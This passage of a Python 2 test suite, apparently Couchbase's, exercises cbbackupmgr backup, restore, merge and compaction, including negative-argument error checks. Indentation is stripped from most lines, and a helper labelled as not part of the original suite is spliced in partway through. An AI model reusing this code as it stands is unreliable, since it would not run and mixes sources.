self.add_built_in_server_user(node=servers[2])
for i in range(1, self.backupset.number_of_backups_after_upgrade + 2):
self.log.info("_backup_restore_with_ops #{0} started...".format(i))
validate_dir_struct = True
if i > 2:
validate_dir_struct = False
self._backup_restore_with_ops(node=self.backupset.cluster_host, repeats=1,
validate_directory_structure=validate_dir_struct)
self.backup_list()
""" merged after upgrade """
if self.after_upgrade_merged:
self.backupset.start = 1
self.backupset.end = len(self.backups)
self.backup_merge_validate()
self.backup_list()
backupsets = [self.backupset]
if "5" <= RestConnection(servers[2]).get_nodes_version()[:1]:
for user in self.users_check_restore:
new_backupset = copy.deepcopy(self.backupset)
new_backupset.restore_cluster_host_username = user.replace('[', '_').replace(']', '_')
backupsets.append(new_backupset)
for backupset in backupsets:
self.backupset = backupset
if self.bucket_flush:
self.log.info("Start to flush bucket")
rest = RestConnection(servers[2])
rest.flush_bucket()
else:
self.bucket_helper.delete_bucket_or_assert(self.backupset.cluster_host,
"default", self)
""" Re-create default bucket on upgrade cluster """
RestConnection(servers[2]).create_bucket(bucket='default',
ramQuotaMB=512,
compressionMode=initial_compression_mode)
self.sleep(5)
self.total_buckets = len(self.buckets)
if self.after_upgrade_merged:
self.backupset.end = 1
""" restore back to cluster """
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
if self.create_gsi:
self.verify_gsi()
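    # --- Hedged sketch (not part of the original test suite) ---------------
    # The online-upgrade test above polls cluster health with a hand-rolled
    # while loop. A helper like this expresses the same wait-with-timeout
    # using the RestHelper/RestConnection calls the test already makes.
    def _wait_for_healthy_cluster(self, server, timeout=120, interval=5):
        waited = 0
        while waited < timeout:
            if RestHelper(RestConnection(server)).is_cluster_healthy():
                return True
            self.sleep(interval, "Wait for server up ")
            waited += interval
        return False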
def test_backup_restore_with_python_sdk(self):
"""
1. Note that python sdk has to be installed on all nodes before running this test
2. Connects to default bucket on cluster host using Python SDK
           - loads specified number of items
3. Creates a backupset, backsup data and validates
4. Restores data and validates
5. Connects to default bucket on restore host using Python SDK
        6. Retrieves cas and flags of each doc on both cluster and restore host
           - validates that they are equal
"""
testuser = [{'id': 'default', 'name': 'default', 'password': 'password'}]
rolelist = [{'id': 'default', 'name': 'default', 'roles': 'admin'}]
self.add_built_in_server_user(testuser, rolelist)
try:
cb = Bucket('couchbase://' + self.backupset.cluster_host.ip + '/default',
password="password")
if cb is not None:
self.log.info("Established connection to bucket on cluster host"
" using python SDK")
else:
self.fail("Failed to establish connection to bucket on cluster host"
" using python SDK")
except Exception, ex:
self.fail(str(ex))
self.log.info("Loading bucket with data using python SDK")
for i in range(1, self.num_items + 1):
cb.upsert("doc" + str(i), "value" + str(i))
cluster_host_data = {}
for i in range(1, self.num_items + 1):
key = "doc" + str(i)
value_obj = cb.get(key=key)
cluster_host_data[key] = {}
cluster_host_data[key]["cas"] = str(value_obj.cas)
cluster_host_data[key]["flags"] = str(value_obj.flags)
self.backup_create()
self.backup_cluster_validate()
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
self.add_built_in_server_user(testuser, rolelist, self.backupset.restore_cluster_host)
try:
cb = Bucket('couchbase://' + self.backupset.restore_cluster_host.ip + '/default',
password="password")
if cb is not None:
self.log.info("Established connection to bucket on restore host " \
"using python SDK")
else:
self.fail("Failed to establish connection to bucket on restore " \
"host using python SDK")
except Exception, ex:
self.fail(str(ex))
restore_host_data = {}
for i in range(1, self.num_items + 1):
key = "doc" + str(i)
value_obj = cb.get(key=key)
restore_host_data[key] = {}
restore_host_data[key]["cas"] = str(value_obj.cas)
restore_host_data[key]["flags"] = str(value_obj.flags)
self.log.info("Comparing cluster host data cas and flags against restore host data")
for i in range(1, self.num_items + 1):
key = "doc" + str(i)
if cluster_host_data[key]["cas"] != restore_host_data[key]["cas"]:
self.fail("CAS mismatch for key: {0}".format(key))
if cluster_host_data[key]["flags"] != restore_host_data[key]["flags"]:
self.fail("Flags mismatch for key: {0}".format(key))
self.log.info("Successfully validated cluster host data cas and flags " \
"against restore host data")
def test_backup_restore_with_flush(self):
"""
1. Test should be run with same-cluster=True
2. Creates specified bucket on the cluster and loads it with given number of items
        3. Creates a backupset - backs up data and validates
4. Flushes the bucket
5. Restores data and validates
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster_validate()
rest = RestConnection(self.backupset.cluster_host)
rest.flush_bucket()
self.log.info("Flushed default bucket - restoring data now..")
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
def test_backup_restore_with_recreate(self):
"""
1. Test should be run with same-cluster=True
2. Creates specified bucket on the cluster and loads it with given number of items
        3. Creates a backupset - backs up data and validates
4. Deletes the bucket and recreates it
5. Restores data and validates
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster_validate()
rest = RestConnection(self.backupset.cluster_host)
rest.delete_bucket()
bucket_name = "default"
rest_helper = RestHelper(rest)
rest.create_bucket(bucket=bucket_name, ramQuotaMB=512)
bucket_ready = rest_helper.vbucket_map_ready(bucket_name)
if not bucket_ready:
self.fail("Bucket {0} is not created after 120 seconds.".format(bucket_name))
self.log.info("Deleted {0} bucket and recreated it - restoring it now.."\
.format(bucket_name))
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
def test_backup_create_negative_args(self):
"""
Validates error messages for negative inputs of create command
"""
remote_client = RemoteMachineShellConnection(self.backupset.backup_host)
cmd = "config"
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
# ['cbbackupmgr config [<args>]', '', 'Required Flags:', '', ' -a,--archive The archive directory to use', ' -r,--repo The name of the backup repository to create and', ' configure', '', 'Optional Flags:', '', ' --exclude-buckets A comma separated list of buckets to exclude from', ' backups. All buckets except for the ones specified', ' will be backed up.', ' --include-buckets A comma separated list of buckets to back up. Only', ' buckets in this list are backed up.', ' --disable-bucket-config Disables backing up bucket configuration', ' information', ' --disable-views Disables backing up view definitions', ' --disable-gsi-indexes Disables backing up GSI index definitions', ' --disable-ft-indexes Disables backing up Full Text index definitions', ' --disable-data Disables backing up cluster data', ' -h,--help Prints the help message', '']
self.assertEqual(output[0], "cbbackupmgr config [<args>]", "Expected error message not thrown")
cmd = "config --archive"
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --archive", "Expected error message not thrown")
cmd = "config --archive {0}".format(self.backupset.directory)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Flag required, but not specified: -r/--repo", "Expected error message not thrown")
cmd = "config --archive {0} --repo".format(self.backupset.directory)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --repo", "Expected error message not thrown")
self.backup_create()
cmd = "config --archive {0} --repo {1}".format(self.backupset.directory, self.backupset.name)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
remote_client.disconnect()
self.assertEqual(output[0], "Backup repository creation failed: Backup Repository `backup` exists",
"Expected error message not thrown")
def test_backup_cluster_restore_negative_args(self):
"""
Validates error messages for negative inputs of cluster or restore command - command parameter
decides which command to test
"""
remote_client = RemoteMachineShellConnection(self.backupset.backup_host)
self.backup_create()
cmd_to_test = self.input.param("command", "backup")
if cmd_to_test == "restore":
cmd = cmd_to_test + " --archive {0} --repo {1} --host http://{2}:{3} --username {4} \
--password {5}".format(self.backupset.directory,
self.backupset.name,
self.backupset.cluster_host.ip,
self.backupset.cluster_host.port,
self.backupset.cluster_host_username,
self.backupset.cluster_host_password)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertTrue("Error restoring cluster: Backup backup doesn't contain any backups" in output[-1],
"Expected error message not thrown")
self.backup_cluster()
cmd = cmd_to_test
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
cmd_test = cmd_to_test
if cmd_to_test.startswith('"') and cmd_to_test.endswith('"'):
cmd_test = cmd_to_test[1:-1]
self.assertEqual(output[0], "cbbackupmgr {} [<args>]".format(cmd_test))
cmd = cmd_to_test + " --archive"
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --archive", "Expected error message not thrown")
cmd = cmd_to_test + " --archive abc -c http://localhost:8091 -u Administrator -p password -r aa"
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Error: Archive directory `abc` doesn't exist", "Expected error message not thrown")
cmd = cmd_to_test + " --archive {0} -c http://localhost:8091 -u Administrator -p password".format(
self.backupset.directory)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Flag required, but not specified: -r/--repo", "Expected error message not thrown")
cmd = cmd_to_test + " --archive {0} --repo".format(self.backupset.directory)
command = "{0}/cbbackupmgr {1} -c http://localhost:8091 -u Administrator -p password -r".format(
self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --repo", "Expected error message not thrown")
cmd = cmd_to_test + " --archive {0} --repo {1} -u Administrator -p password".format(self.backupset.directory,
self.backupset.name)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Flag required, but not specified: -c/--cluster",
"Expected error message not thrown")
cmd = cmd_to_test + " --archive {0} --repo {1} -c -u Administrator -p password -r repo".format(
self.backupset.directory, self.backupset.name)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: -c", "Expected error message not thrown")
cmd = cmd_to_test + " --archive {0} --repo {1} -c http://{2}:{3}".format(self.backupset.directory,
self.backupset.name,
self.backupset.cluster_host.ip,
self.backupset.cluster_host.port)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Flag required, but not specified: -u/--username",
"Expected error message not thrown")
cmd = cmd_to_test + " --archive {0} --repo {1} --cluster http://{2}:{3} \
--username".format(self.backupset.directory,
self.backupset.name,
self.backupset.cluster_host.ip,
self.backupset.cluster_host.port)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --username", "Expected error message not thrown")
cmd = cmd_to_test + " --archive {0} --repo {1} --cluster http://{2}:{3} \
--username {4}".format(self.backupset.directory,
self.backupset.name,
self.backupset.cluster_host.ip,
self.backupset.cluster_host.port,
self.backupset.cluster_host_username)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Flag required, but not specified: -p/--password",
"Expected error message not thrown")
cmd = cmd_to_test + " --archive {0} --repo abc --cluster http://{1}:{2} --username {3} \
--password {4}".format(self.backupset.directory,
self.backupset.cluster_host.ip,
self.backupset.cluster_host.port,
self.backupset.cluster_host_username,
self.backupset.cluster_host_password)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
part_message = "backing up"
if cmd_to_test.startswith('"') and cmd_to_test.endswith('"'):
cmd_test = cmd_to_test[1:-1]
if cmd_test == "restore":
part_message = 'restoring'
self.assertTrue("Error {0} cluster: Backup Repository `abc` not found"\
.format(part_message) in output[-1],
"Expected error message not thrown. Actual output %s " % output[-1])
cmd = cmd_to_test + " --archive {0} --repo {1} --cluster abc --username {2} \
--password {3}".format(self.backupset.directory,
self.backupset.name,
self.backupset.cluster_host_username,
self.backupset.cluster_host_password)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertTrue("Error {0} cluster: dial tcp:".format(part_message) in output[-1],
"Expected error message not thrown")
cmd = cmd_to_test + " --archive {0} --repo {1} --cluster http://{2}:{3} --username abc \
--password {4}".format(self.backupset.directory,
self.backupset.name,
self.backupset.cluster_host.ip,
self.backupset.cluster_host.port,
self.backupset.cluster_host_password)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertTrue("check username and password" in output[-1], "Expected error message not thrown")
cmd = cmd_to_test + " --archive {0} --repo {1} --cluster http://{2}:{3} --username {4} \
--password abc".format(self.backupset.directory,
self.backupset.name,
self.backupset.cluster_host.ip,
self.backupset.cluster_host.port,
self.backupset.cluster_host_username)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
remote_client.disconnect()
self.assertTrue("check username and password" in output[-1], "Expected error message not thrown")
def test_backup_list_negative_args(self):
"""
Validates error messages for negative inputs of list command
"""
remote_client = RemoteMachineShellConnection(self.backupset.backup_host)
self.backup_create()
cmd = "list"
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "cbbackupmgr list [<args>]", "Expected error message not thrown")
cmd = "list --archive"
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --archive", "Expected error message not thrown")
cmd = "list --archive abc".format(self.backupset.directory)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
remote_client.disconnect()
self.assertTrue("Error: Archive directory `abc` doesn't exist" in output[-1],
"Expected error message not thrown")
def test_backup_compact_negative_args(self):
"""
Validates error messages for negative inputs of compact command
"""
remote_client = RemoteMachineShellConnection(self.backupset.backup_host)
self.backup_create()
self.backup_cluster()
cmd = "compact"
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "cbbackupmgr compact [<args>]",
"Expected error message not thrown")
cmd = "compact --archive"
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --archive",
"Expected error message not thrown")
cmd = "compact --archive {0}".format(self.backupset.directory)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Flag required, but not specified: -r/--repo",
"Expected error message not thrown")
cmd = "compact --archive {0} --repo".format(self.backupset.directory)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --repo",
"Expected error message not thrown")
cmd = "compact --archive {0} --repo {1}".format(self.backupset.directory,
self.backupset.name)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Flag required, but not specified: -/--backup",
"Expected error message not thrown")
cmd = "compact --archive {0} --repo {1} --backup" \
.format(self.backupset.directory, self.backupset.name)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --backup",
"Expected error message not thrown")
cmd = "compact --archive abc --repo {0} --backup {1}" \
.format(self.backupset.name, self.backups[0])
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertTrue("Error opening archive at abc due to `Not an archive directory" \
in output[-1],
"Expected error message not thrown")
cmd = "compact --archive {0} --repo abc --backup {1}" \
.format(self.backupset.directory, self.backups[0])
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertTrue("Backup Repository `abc` not found" in output[-1],
"Expected error message not thrown")
cmd = "compact --archive {0} --repo {1} --backup abc".format(self.backupset.directory,
self.backupset.name)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
remote_client.disconnect()
self.assertTrue("Compacting incr backup `abc` of backup `backup` failed:" in output[-1],
"Expected error message not thrown")
def test_backup_merge_negative_args(self):
"""
Validates error messages for negative inputs of merge command
"""
remote_client = RemoteMachineShellConnection(self.backupset.backup_host)
self.backup_create()
cmd = "merge"
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "cbbackupmgr merge [<args>]", "Expected error message not thrown")
cmd = "merge --archive -c http://localhost:8091 -u Administrator -p password -r aa"
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --archive", "Expected error message not thrown")
cmd = "merge --archive {0}".format(self.backupset.directory)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Flag required, but not specified: -r/--repo", "Expected error message not thrown")
cmd = "merge --archive {0} --repo".format(self.backupset.directory)
command = "{0}/cbbackupmgr {1} -r".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --repo", "Expected error message not thrown")
cmd = "merge --archive {0} --repo {1}".format(self.backupset.directory, self.backupset.name)
command = "{0}/cbbackupmgr {1} --start start --end end".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Error merging data: Backup backup doesn't contain any backups",
"Expected error message not thrown")
self._take_n_backups(n=2)
cmd = "merge --archive {0} --repo {1}".format(self.backupset.directory, self.backupset.name)
command = "{0}/cbbackupmgr {1} --start bbb --end end".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Error merging data: Error restoring data, `bbb` is invalid start point",
"Expected error message not thrown")
cmd = "merge --archive {0} --repo {1} --start".format(self.backupset.directory, self.backupset.name)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --start", "Expected error message not thrown")
cmd = "merge --archive {0} --repo {1} --start {2}".format(self.backupset.directory,
self.backupset.name, self.backups[0])
command = "{0}/cbbackupmgr {1} --end aa".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Error merging data: Error restoring data, `aa` is invalid end point",
"Expected error message not thrown")
cmd = "merge --archive {0} --repo {1} --start {2} --end".format(self.backupset.directory,
self.backupset.name, self.backups[0])
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --end", "Expected error message not thrown")
cmd = "merge --archive abc --repo {0} --start {1} --end {2}".format(self.backupset.name,
self.backups[0], self.backups[1])
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertTrue("Error: Archive directory `abc` doesn't exist" in output[-1],
"Expected error message not thrown")
cmd = "merge --archive {0} --repo abc --start {1} --end {2}".format(self.backupset.directory,
self.backups[0], self.backups[1])
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertTrue("Error merging data: Backup Repository `abc` not found" in output[-1],
"Expected error message not thrown")
cmd = "merge --archive {0} --repo {1} --start abc --end {2}".format(self.backupset.directory,
self.backupset.name, self.backups[1])
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertTrue("Error merging data: Error restoring data, `abc` is invalid start point" in output[-1],
"Expected error message not thrown")
cmd = "merge --archive {0} --repo {1} --start {2} --end abc".format(self.backupset.directory,
self.backupset.name, self.backups[0])
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertTrue("Error merging data: Error restoring data, `abc` is invalid end point" in output[-1],
"Expected error message not thrown")
cmd = "merge --archive {0} --repo {1} --start {2} --end {3}".format(self.backupset.directory,
self.backupset.name,
self.backups[1], self.backups[0])
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
remote_client.disconnect()
self.assertTrue("Error merging data: start point `{0}` is after end point `{1}`".format
(self.backups[1], self.backups[0]) in output[-1],
"Expected error message not thrown")
def test_backup_remove_negative_args(self):
"""
Validates error messages for negative inputs of remove command
"""
remote_client = RemoteMachineShellConnection(self.backupset.backup_host)
self.backup_create()
self.backup_cluster()
cmd = "remove"
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "cbbackupmgr remove [<args>]", "Expected error message not thrown")
cmd = "remove --archive -c http://localhost:8091 -u Administrator -p password -r aa"
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --archive", "Expected error message not thrown")
cmd = "remove --archive {0}".format(self.backupset.directory)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Flag required, but not specified: -r/--repo", "Expected error message not thrown")
cmd = "remove --archive {0} --repo".format(self.backupset.directory)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --repo", "Expected error message not thrown")
cmd = "remove --archive abc --repo {0}".format(self.backupset.name)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertTrue("Error: Archive directory `abc` doesn't exist" in output[-1],
"Expected error message not thrown")
cmd = "remove --archive {0} --repo abc".format(self.backupset.directory)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
remote_client.disconnect()
self.assertTrue("Backup Repository `abc` not found" in output[-1],
"Expected error message not thrown")
def test_backup_restore_with_views(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backupset
3. Creates a simple view on source cluster
4. Backs up data and validates
5. Restores data and validates
6. Ensures that same view is created in restore cluster
"""
if Bucket.Type.EPHEMERAL in \
self.input.param("bucket_type", Bucket.Type.MEMBASE):
self.log.info("\n****** view does not support on ephemeral bucket ******")
return
rest_src = RestConnection(self.backupset.cluster_host)
rest_src.add_node(self.servers[1].rest_username, self.servers[1].rest_password,
self.servers[1].ip, services=['index', 'kv'])
rebalance = self.cluster.async_rebalance(self.cluster_to_backup, [], [])
rebalance.result()
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
default_map_func = "function (doc) {\n emit(doc._id, doc);\n}"
default_view_name = "test"
default_ddoc_name = "ddoc_test"
prefix = "dev_"
query = {"full_set": "true", "stale": "false", "connection_timeout": 60000}
view = View(default_view_name, default_map_func)
task = self.cluster.async_create_view(self.backupset.cluster_host,
default_ddoc_name, view, "default")
task.result()
self.backup_cluster_validate()
rest_target = RestConnection(self.backupset.restore_cluster_host)
rest_target.add_node(self.input.clusters[0][1].rest_username,
self.input.clusters[0][1].rest_password,
self.input.clusters[0][1].ip, services=['kv', 'index'])
rebalance = self.cluster.async_rebalance(self.cluster_to_restore, [], [])
rebalance.result()
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
try:
result = self.cluster.query_view(self.backupset.restore_cluster_host,
prefix + default_ddoc_name,
default_view_name, query, timeout=30)
self.assertEqual(len(result['rows']), self.num_items,
"Querying view on restore cluster did not return expected number of items")
self.log.info("Querying view on restore cluster returned expected number of items")
except TimeoutError:
self.fail("View could not be queried in restore cluster within timeout")
def test_backup_restore_with_gsi(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backupset
3. Creates a GSI index on source cluster
4. Backs up data and validates
5. Restores data and validates
6. Ensures that same gsi index is created in restore cluster
"""
rest_src = RestConnection(self.backupset.cluster_host)
self.cluster_storage_mode = \
rest_src.get_index_settings()["indexer.settings.storage_mode"]
self.log.info("index storage mode: {0}".format(self.cluster_storage_mode))
rest_src.add_node(self.servers[1].rest_username, self.servers[1].rest_password,
self.servers[1].ip, services=['kv', 'index'])
rebalance = self.cluster.async_rebalance(self.cluster_to_backup, [], [])
rebalance.result()
self.test_storage_mode = self.cluster_storage_mode
if Bucket.Type.EPHEMERAL in self.bucket_type:
self.log.info("ephemeral bucket needs to set backup cluster to memopt for gsi.")
self.test_storage_mode = "memory_optimized"
self._reset_storage_mode(rest_src, self.test_storage_mode)
rest_src.add_node(self.servers[1].rest_username, self.servers[1].rest_password,
self.servers[1].ip, services=['kv', 'index'])
rebalance = self.cluster.async_rebalance(self.cluster_to_backup, [], [])
rebalance.result()
rest_src.create_bucket(bucket='default', ramQuotaMB=int(self.quota) - 1,
bucketType=self.bucket_type,
evictionPolicy="noEviction")
self.add_built_in_server_user(node=self.backupset.cluster_host)
gen = DocumentGenerator('test_docs', '{{"age": {0}}}', xrange(100),
start=0, end=self.num_items)
self.buckets = rest_src.get_buckets()
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
cmd = "cbindex -type create -bucket default -using %s -index age -fields=age " \
" -auth %s:%s" % (self.test_storage_mode,
self.master.rest_username,
self.master.rest_password)
shell = RemoteMachineShellConnection(self.backupset.cluster_host)
command = "{0}/{1}".format(self.cli_command_location, cmd)
output, error = shell.execute_command(command)
shell.log_command_output(output, error)
shell.disconnect()
if error or "Index created" not in output[-1]:
self.fail("GSI index cannot be created")
self.backup_cluster_validate()
rest_target = RestConnection(self.backupset.restore_cluster_host)
rest_target.add_node(self.input.clusters[0][1].rest_username,
self.input.clusters[0][1].rest_password,
self.input.clusters[0][1].ip, services=['kv', 'index'])
rebalance = self.cluster.async_rebalance(self.cluster_to_restore, [], [])
rebalance.result()
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
cmd = "cbindex -type list -auth %s:%s" % (self.master.rest_username,
self.master.rest_password)
shell = RemoteMachineShellConnection(self.backupset.restore_cluster_host)
command = "{0}/{1}".format(self.cli_command_location, cmd)
output, error = shell.execute_command(command)
shell.log_command_output(output, error)
shell.disconnect()
try:
if len(output) > 1:
self.assertTrue("Index:default/age" in output[1],
"GSI index not created in restore cluster as expected")
self.log.info("GSI index created in restore cluster as expected")
else:
self.fail("GSI index not created in restore cluster as expected")
finally:
if Bucket.Type.EPHEMERAL in self.bucket_type:
self.log.info("reset storage mode back to original")
self._reset_storage_mode(rest_src, self.cluster_storage_mode)
self._reset_storage_mode(rest_target, self.cluster_storage_mode)
def test_backup_merge_restore_with_gsi(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backupset
3. Creates a GSI index on source cluster
4. Backs up data and validates
5. Restores data and validates
6. Ensures that same gsi index is created in restore cluster
"""
rest_src = RestConnection(self.backupset.cluster_host)
rest_src.add_node(self.servers[1].rest_username,
self.servers[1].rest_password,
self.servers[1].ip, services=['index'])
rebalance = self.cluster.async_rebalance(self.cluster_to_backup, [],
[])
rebalance.result()
gen = DocumentGenerator('test_docs', '{{"Num1": {0}, "Num2": {1}}}',
xrange(100), xrange(100),
start=0, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
cmd = "cbindex -type create -bucket default -using forestdb -index " \
"num1 -fields=Num1"
remote_client = RemoteMachineShellConnection(
self.backupset.cluster_host)
command = "{0}/{1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
remote_client.disconnect()
if error or "Index created" not in output[-1]:
self.fail("GSI index cannot be created")
self.backup_cluster_validate()
cmd = "cbindex -type create -bucket default -using forestdb -index " \
"num2 -fields=Num2"
remote_client = RemoteMachineShellConnection(
self.backupset.cluster_host)
